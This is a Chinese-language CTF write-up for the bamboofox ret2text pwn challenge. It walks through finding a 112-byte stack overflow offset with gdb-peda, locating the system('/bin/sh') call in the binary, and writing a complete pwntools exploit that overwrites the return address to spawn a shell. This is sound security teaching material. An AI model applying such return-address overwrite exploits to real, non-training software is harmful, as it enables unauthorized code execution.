bamboofox-ret2text

Posted on | In | | Visitors:
Words count in article: 575 | Reading time ≈ 3

题目地址:bamboofox-ret2text

1.基本信息收集

首先查看文件信息:

bam1.png

查看保护:

bam2.png

ida查看反汇编:

bam3.png

bam4.png

发现有栈溢出漏洞,且存在system函数。

采用基本ROP的ret2text

1.计算偏移量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/hc/study/pwn/stackoverflow/Ret2text/bamboofox-ret2text/ret2text 
There is something amazing here, do you know anything?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Maybe I will tell you next time !
Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0x21 ('!')
EDX: 0xf7fb5890 --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x6941414d ('MAAi')
ESP: 0xffffce30 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41384141 ('AA8A')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41384141
[------------------------------------stack-------------------------------------]
0000| 0xffffce30 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffce34 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffce38 ("AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffce3c ("AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffce40 ("PAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffce44 ("AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffce48 ("AmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffce4c ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41384141 in ?? ()
gdb-peda$ pattern search
Registers contain pattern buffer:
EBP+0 found at offset: 108
EIP+0 found at offset: 112
Registers point to pattern buffer:
[ESP] --> offset 116 - size ~84
Pattern buffer found at:
0x0804b160 : offset    0 - size  200 ([heap])
0xffffcdbc : offset    0 - size  200 ($sp + -0x74 [-29 dwords])
References to pattern buffer found at:
0xf7fb45cc : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d0 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d4 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d8 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45dc : 0x0804b160 (/lib32/libc-2.27.so)
0xffffcd04 : 0x0804b160 ($sp + -0x12c [-75 dwords])
0xffffcd90 : 0xffffcdbc ($sp + -0xa0 [-40 dwords])

得到112

2.查看system函数地址:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
gdb-peda$ disas secure
Dump of assembler code for function secure:
   0x080485fd <+0>: push   ebp
   0x080485fe <+1>: mov    ebp,esp
   0x08048600 <+3>: sub    esp,0x28
   0x08048603 <+6>: mov    DWORD PTR [esp],0x0
   0x0804860a <+13>:    call   0x8048470 <time@plt>
   0x0804860f <+18>:    mov    DWORD PTR [esp],eax
   0x08048612 <+21>:    call   0x80484b0 <srand@plt>
   0x08048617 <+26>:    call   0x80484e0 <rand@plt>
   0x0804861c <+31>:    mov    DWORD PTR [ebp-0xc],eax
   0x0804861f <+34>:    lea    eax,[ebp-0x10]
   0x08048622 <+37>:    mov    DWORD PTR [esp+0x4],eax
   0x08048626 <+41>:    mov    DWORD PTR [esp],0x8048760
   0x0804862d <+48>:    call   0x80484f0 <__isoc99_scanf@plt>
   0x08048632 <+53>:    mov    eax,DWORD PTR [ebp-0x10]
   0x08048635 <+56>:    cmp    eax,DWORD PTR [ebp-0xc]
   0x08048638 <+59>:    jne    0x8048646 <secure+73>
   0x0804863a <+61>:    mov    DWORD PTR [esp],0x8048763
   0x08048641 <+68>:    call   0x8048490 <system@plt>
   0x08048646 <+73>:    leave  
   0x08048647 <+74>:    ret    
End of assembler dump.

这里注意地址要为call system的上一个地址,因为:

1
2
gdb-peda$ x/s 0x8048763
0x8048763:  "/bin/sh"

要先把/bin/sh字符串传入函数。

sys_addr = 0x0804863a

3.编写exp

1
2
3
4
5
6
7
8
9
10
from pwn import *

p = process('./ret2text')

sys_addr = 0x0804863a
payload = 'A'*112 + p32(sys_addr)

p.recv()
p.sendline(payload)
p.interactive()

bam5.png

0%
//这里改为从本地加载